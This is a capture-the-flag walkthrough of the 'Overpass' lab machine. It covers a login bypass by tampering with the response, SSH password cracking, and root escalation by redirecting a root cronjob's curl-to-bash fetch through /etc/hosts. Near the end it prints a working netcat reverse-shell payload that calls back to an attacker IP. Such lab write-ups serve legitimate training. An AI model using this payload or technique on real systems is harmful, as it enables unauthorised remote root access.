Overpass

image

Port Scan

image

Directory Scan

image

Web Exploitation

• After seeing all the directories, /admin was most intresting to me

• Looking at the source code I found some intresting .js files

image

• login.js

image

• This piece of code has an vulnerability, it checks the response of the browser and if it doesn't incorrect credentials, it redirect us to the /admin page

get admin privilege

• Intercept login request with burp suite and change the response to get the admin panel

• Right-click on the request and > Do intercept > Request to this response

• This is the response we get

image

• Updated response

image

• Admin homepage

image

User Shell

• we got username from the admin panel, I've used John to crack the SSH password

image

• We successfully got a shell

image

Root shell

• I've used python server to get linpeas into the machine

image

image

• We have permission to write in /etc/hosts

image

• There's a cronjob running on root service which basicallay uses curl and pipe it into bash

• We are going to change the content of /etc/hosts , adding our ip as overpass.thm

image

• First create files in your localhost

image

• Add a payload in buildscript.sh

└─$ cat downloads/src/buildscript.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.250 4444 >/tmp/f

• Add your ip and port [ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]

• Start a python3 server

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.120.231 - - [02/Feb/2022 18:17:05] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -

• Start netcat listener

• Wait around 1 minute to get root shell

image

image